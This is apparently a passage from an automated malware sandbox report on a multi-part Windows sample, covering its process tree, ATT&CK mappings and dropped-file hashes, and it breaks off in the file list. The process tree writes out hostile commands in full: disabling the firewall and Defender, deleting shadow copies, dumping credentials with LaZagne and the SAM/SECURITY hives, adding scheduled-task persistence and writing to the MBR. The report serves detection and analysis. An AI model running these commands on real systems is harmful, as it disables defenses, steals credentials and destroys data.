- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set privateprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3932
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set publicprofile state off
    3⤵
    - Modifies Windows Firewall
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:5384
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:5872
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:5948
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5348
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4480
- C:\Users\Admin\AppData\Roaming\pass.exe
  "C:\Users\Admin\AppData\Roaming\pass.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt
    3⤵
    PID:5760
  - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
      laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
      4⤵
      Executes dropped EXE
      PID:6004
    - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
        
        laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        outlook_win_path
        
        PID:5472
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\anjvxwdmgl"
        6⤵
        
        PID:5928
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\jusmdcqpgdd"
        6⤵
        
        PID:5976
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\jusmdcqpgdd
        7⤵
        
        PID:6076
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\afbmkkla"
        6⤵
        
        PID:5956
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & del /f credentials* & del /f pass.txt & del /f LaZagne.exe & del /f tool.bin
    3⤵
    PID:5632
- C:\Users\Admin\AppData\Roaming\steal.exe
  "C:\Users\Admin\AppData\Roaming\steal.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:972
- - C:\Users\Admin\AppData\Roaming\steal.exe
    "C:\Users\Admin\AppData\Roaming\steal.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:6020
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1076
- C:\Users\Admin\AppData\Roaming\server.exe
  "C:\Users\Admin\AppData\Roaming\server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4020
- C:\Users\Admin\AppData\Roaming\discord.exe
  "C:\Users\Admin\AppData\Roaming\discord.exe"
  2⤵
  - Executes dropped EXE
  PID:5240

C:\Users\Admin\AppData\Roaming\lm.exe
lm.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:4324

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
1⤵
- Creates scheduled task(s)
PID:1968

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1440

C:\Windows\system32\reg.exe
reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\anjvxwdmgl
1⤵
PID:5792

C:\Windows\system32\reg.exe
reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\afbmkkla
1⤵
PID:2696

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:5984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:1844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\VCRUNTIME140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

SHA512
d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_asyncio.pyd

Filesize
63KB

MD5
511a52bcb0bd19eda7aa980f96723c93

SHA1
b11ab01053b76ebb60ab31049f551e5229e68ddd

SHA256
d1fb700f280e7793e9b0dca33310ef9cd08e9e0ec4f7416854dffaf6f658a394

SHA512
d29750950db2ecbd941012d7fbdd74a2bbd619f1a92616a212acb144da75880ce8a29ec3313acbc419194219b17612b27a1833074bbbaa291cdb95b05f8486ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_cffi_backend.cp311-win_amd64.pyd

Filesize
177KB

MD5
210def84bb2c35115a2b2ac25e3ffd8f

SHA1
0376b275c81c25d4df2be4789c875b31f106bd09

SHA256
59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf

SHA512
cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_decimal.pyd

Filesize
247KB

MD5
be315973aff9bdeb06629cd90e1a901f

SHA1
151f98d278e1f1308f2be1788c9f3b950ab88242

SHA256
0f9c6cc463611a9b2c692382fe1cdd7a52fea4733ffaf645d433f716f8bbd725

SHA512
8ea715438472e9c174dee5ece3c7d9752c31159e2d5796e5229b1df19f87316579352fc3649373db066dc537adf4869198b70b7d4d1d39ac647da2dd7cfc21e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_hashlib.pyd

Filesize
63KB

MD5
1524882af71247adecf5815a4e55366a

SHA1
e25014c793c53503bdff9af046140edda329d01b

SHA256
6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327

SHA512
5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_multiprocessing.pyd

Filesize
33KB

MD5
2ca9fe51bf2ee9f56f633110a08b45cd

SHA1
88ba6525c71890a50f07547a5e9ead0754dd85b9

SHA256
1d6f1e7e9f55918967a37cbd744886c2b7ee193c5fb8f948132ba40b17119a81

SHA512
821551fa1a5aa21f76c4ae05f44ddd4c2daa00329439c6dadc861931fa7bd8e464b4441dfe14383f2bb30c2fc2dfb94578927615b089a303aa39240e15e89de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_overlapped.pyd

Filesize
49KB

MD5
ac053ef737e4f13b02bfa81f9e46170b

SHA1
5d8ebeb30671b74d736731696fedc78c89da0e1f

SHA256
cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f

SHA512
6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_queue.pyd

Filesize
31KB

MD5
8bbed19359892f8c95c802c6ad7598e9

SHA1
773fca164965241f63170e7a1f3a8fa17f73ea18

SHA256
4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065

SHA512
22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_sqlite3.pyd

Filesize
117KB

MD5
a7df575bf69570944b004dfe150e8caf

SHA1
2fd19be98a07347d59afd78c167601479aac94bb

SHA256
b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b

SHA512
18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_ssl.pyd

Filesize
172KB

MD5
a0b40f1f8fc6656c5637eacacf7021f6

SHA1
38813e25ffde1eee0b8154fa34af635186a243c1

SHA256
79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1

SHA512
c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\_uuid.pyd

Filesize
24KB

MD5
4faa479423c54d5be2a103b46ecb4d04

SHA1
011f6cdbd3badaa5c969595985a9ad18547dd7ec

SHA256
c2ad3c1b4333bc388b6a22049c89008505c434b1b85bff0823b19ef0cf48065a

SHA512
92d35824c30667af606bba883bf6e275f2a8b5cbfea2e84a77e256d122b91b3ee7e84d9f4e2a4946e903a11293af9648a45e8cfbe247cbdc3bcdea92eb5349c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\base_library.zip

Filesize
1.4MB

MD5
080b0d0a63f2663682a8c422d614fe0b

SHA1
e63662b070ca6c305ad54687680303411f7ff13b

SHA256
eb0a4049f68f1ec0fa55f97475e8209bc5c4836b68162b599d26a1a7195dbf39

SHA512
7e3fc1df03c1a367f2831589c2bd8b986734e77d301dd3efee35ef99a50d1863422e6f4f364c8d9c8a14f74921ab86ec49cfa557e910c728c515548b01d670dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\libcrypto-3.dll

Filesize
1.6MB

MD5
25b9994220fe894a5c9c759f90ae76a4

SHA1
dc4fc8d3a85ff0d63b8442363af648f8c43ba7c9

SHA256
1414c774ea4faefdeae92194667b3fbfe80b5cc46c428479d5dc687b1f1f7c19

SHA512
6ce7ab4a82e390304d417952b8110ee7958b2e18a1370bc833712d2a9be108a73edbfd1b8fcf125fa08c1ecc8bda44ab3c661d29b5cbdfb985862b9929e5f5fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\libssl-3.dll

Filesize
771KB

MD5
64acb046fe68d64ee475e19f67253a3c

SHA1
d9e66c9437ce6f775189d6fdbd171635193ec4cc

SHA256
b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10

SHA512
f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\python311.dll

Filesize
699KB

MD5
1d29d1a299730652d9aec5f6792733ae

SHA1
a6a17b24a8fa916ff354f2fc7c471bb99c755e2d

SHA256
7c3be904cffa67aceb8d05c0270b48574f0ad2dfea1d732146e05d01ca7b2ab1

SHA512
a1aa93b971884fead9ef2c18e6b99590cef7a0dd09dbe72a7f105293160999a55afd9c38cea9ced2c44960d4af2e8a2f6972fe441aeffbb67673c9117eba4d1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\python311.dll

Filesize
1.9MB

MD5
506e078d7c67f5a455d624874a1ca40e

SHA1
921dd14f2c63d8a2b685bbd4605d8769ca798e03

SHA256
74677f46a59ff010eaf83e79e3f17ab9125d4f4057c9910c5b5bcca8cfc7c282

SHA512
f00042dbe222f163368ba35aec88e9598b2d3a51751ebabc5f9975031112ae8d919fff2930fedf1a69389db88c89a1d97d826c119b892994a8f09a6a8032795e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\pywin32_system32\pythoncom311.dll

Filesize
654KB

MD5
f98264f2dacfc8e299391ed1180ab493

SHA1
849551b6d9142bf983e816fef4c05e639d2c1018

SHA256
0fe49ec1143a0efe168809c9d48fe3e857e2ac39b19db3fd8718c56a4056696b

SHA512
6bb3dbd9f4d3e6b7bd294f3cb8b2ef4c29b9eff85c0cfd5e2d2465be909014a7b2ecd3dc06265b1b58196892bb04d3e6b0aa4b2ccbf3a716e0ff950eb28db11c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\pywin32_system32\pywintypes311.dll

Filesize
131KB

MD5
90b786dc6795d8ad0870e290349b5b52

SHA1
592c54e67cf5d2d884339e7a8d7a21e003e6482f

SHA256
89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a

SHA512
c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\sqlite3.dll

Filesize
1.4MB

MD5
b49b8fde59ee4e8178c4d02404d06ee7

SHA1
1816fc83155d01351e191d583c68e722928cce40

SHA256
1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f

SHA512
a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9722\unicodedata.pyd

Filesize
739KB

MD5
c75d9bbfed663a367877acbe0580708b

SHA1
7ba5c6267489b8025900a4f925b2a35c70cb2208

SHA256
56f8f53c2fb2b126a5d19223570decfc09ff3ca9cd22cad8a70129d8b80383fd

SHA512
c78465fc6c2b3076b075283b4539b93b070aad8fdca56f8c2783d7eb667a0245437a922e8192158ccf175fac2f3e99d4c481cd7320893ef81adb6e496b278034

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ra0tw5wp.nqi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\crcook.txt

Filesize
18B

MD5
b9e8157d18b9bede4d2acc18dfe72a8a

SHA1
c616a2da76b6004ee5c2b4313295e741b6ebd2ae

SHA256
0c93b35e13c256b28d5920492713000412e88ce011f51fe7908c7e3260bea60b

SHA512
16b18f19ed677891e58f921bbd3de4dcabdf2f818bef3cd53ea0b5ba98ee6a255fea35e625e7d1b39c83df4638c29898fbc05e1b780cf671a033fc4eeef5eceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\mmvpahrzg

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\ngugaubjk

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll

Filesize
111KB

MD5
b59b0f6193bcc7e78a3b2fc730196be3

SHA1
045469fec2df2a9c75b550984a0ed32db2e9f846

SHA256
003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

SHA512
73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

Download Submit
C:\Users\Admin\AppData\Roaming\boot.bin

Filesize
512B

MD5
dbf320f4332f8ccb4c05f8df1983e05e

SHA1
9eb564927e4c618b8f0d33bf55270d5867404e92

SHA256
b91e7d1e0a4f5c8c024816637d5d0ce1b1c1e3abb494f0168e10e09425fe7cc0

SHA512
12291b07b6edd58800137847fb0a8da63ebf63ac4fcac9a74ef5d287e6fe8cc45f62436e07006c6f0af09e58029be1b88fb8f2d60573c098daf3f314ab391493

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
890KB

MD5
5be1e1c91f6322b5cf5fb6773945ddc9

SHA1
2b5091a8874aba1fb69eba77c9f206111fb9dfa1

SHA256
43cf59a3b7cc942be52a685136c3d53606af0c5bc47b38539791597a5b31c00a

SHA512
5c270ace6744746ac9db857cd77583ab382de084965847923b9b5c268bb7fac3fd360e7a38924aaae4bf3400ae838b149eb62c3ca6ffc494fb2f606dc7a303d5

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
945KB

MD5
0919c1542739bfcbfdab66f030facb94

SHA1
6b779d909c8157c8ee986ef8edb9ee0334aaaed3

SHA256
5f666b87e7a7b0ec69747c17950146813524e92df1dd4f915d652ca0dc07cb04

SHA512
a32895d12454e455a89f1634a73f6322068ce2fd9acaddb5e1a2a22c84a65a9ce718d907b73f4f1aac3eb032258955380c6ff52400cf01dc615daa5fdbc616c6

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
861KB

MD5
8e02af2637d1135ddd2c4c2d25862fa5

SHA1
871fefd866d881b3c6748d4d47f88684c83bdc95

SHA256
e53b05f02ef4a60206aa6b1d164041811606db1db400c25b7aa9a7b833faf304

SHA512
2878daa8bf17ab4af5074e78544a596df89184f33305548f1e1a47b3afce75902259ac8d3ecdf5920f9133579f4a74f11f59be529aca4cc97a19d2802870357d

Download Submit
C:\Users\Admin\AppData\Roaming\lm.exe

Filesize
39KB

MD5
86e3192ad129a388e4f0ac864e84df78

SHA1
70a2b1422b583c2d768a6f816905bc85687ced52

SHA256
4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

SHA512
f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

Download Submit
C:\Users\Admin\AppData\Roaming\mbr.exe

Filesize
101KB

MD5
00e306f18b8cc56f347f34a7ebaf7f9f

SHA1
2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

SHA256
ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

SHA512
2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
1.6MB

MD5
ae21865b0cef6f5b3afbd33dc0fe00fb

SHA1
6416c1c08276749ea7f853ef0f9610a592197699

SHA256
413ca434a9bdda0c95ab542588b0f5d135496c78a39a5997075e258c5f865e12

SHA512
cfa3e03c3f4c9e888b07243e7967e2ddead19efdc4ac0ee9267e226dfa00e11a71d3e5a59b49d37189090e04d421b491f993d901120edbd35d891e16e7c95329

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
1.3MB

MD5
727f4ca5912b8b5be347ea40b1650066

SHA1
ec3beaaa64b6f005099e201f778078d3d671c466

SHA256
2ae92088c0e457c205445be52fe7686944adee32184df2393cdc34c410319745

SHA512
651fdac16b73919484b591469ece6b4642872f8873546485c4798ce0b9bf66c4cd09fbc75ff1c39115235e7e176458e7d391b7ddac217114e87c077e88d9c1f0

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
1.2MB

MD5
42ff8e28eee894074ca1120c4ca0b7f3

SHA1
bbec7b424d3281000711294b1a8a07c3561a9bdc

SHA256
2ff4fa2bb9613b8daf77d6d4832e5616a1ba3002962d9ac067af31b52bfc7020

SHA512
8920b99f04de2c9f95e1e4abaf279946fdd019a28156d06610f4bb6b108df09545ebbbebf0b89072875ccce8b035f2eb5905bb527334380acd7a81a65b2f2fc9

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
2.1MB

MD5
35b939409a496a9ceb59b710931ebd5d

SHA1
4848d00c7e495d2b0889df8af5fdd10545c9f649

SHA256
8309e52ef417278723789ff2dc28a428aee0e9cfd2cd826d83904f5d4d6db0bf

SHA512
78ac847b39ec01dc0b38c4cc6d353a9a5d142e3cccb6a87b6d0ad0599123c42ad7d3bc19571c84e8603ed25c648b5cf538e9b13049c6bbdd1fee3fc5c6dbff04

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
705KB

MD5
b557fd9c4a8dc6ee11262ee7784b428b

SHA1
4113361d099e9e32f7c3d3b612e5297361cacdcd

SHA256
4ed4d8a1314fa594537c06994d34ecf17ed7646f7431c797a6f7bcd209f86f67

SHA512
61d38f57afcc3a4a3405ec1fdca3837cd1b792b414e18b653df037b91163d63a5b751ef2e7b9dc1ee1d41929a90773620e003036ad3ad52c4c9261eeb39561a7

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
2.2MB

MD5
7bccd71b0ca84b711a1769bbacddf28a

SHA1
44df3bd96d3fb3958443016a84f74f04ad23271f

SHA256
b208939c2566ba5f44227b79365bb1d7f50241b7d209ac33a3acc923e351479c

SHA512
6f361c9e13a40075962b9f8f079cd3d2b8e3e325f4a9a63d9baa5b2582423d9ad13ff456eb5dbaf1e3ba02bfd72d1072067f07d730a7de8583c06e161710bbb6

Download Submit
C:\Users\Admin\AppData\Roaming\settings.bat

Filesize
67B

MD5
a204d9e5059a5449af7af765d371d6ea

SHA1
cfc6f78545bdc6a1c82491500f1bacfb38bef28c

SHA256
d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

SHA512
d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
1.2MB

MD5
81774cb011ac6df651a1928e4492b76d

SHA1
59b8a7c5926f166615bbe95a4ba456314020df3d

SHA256
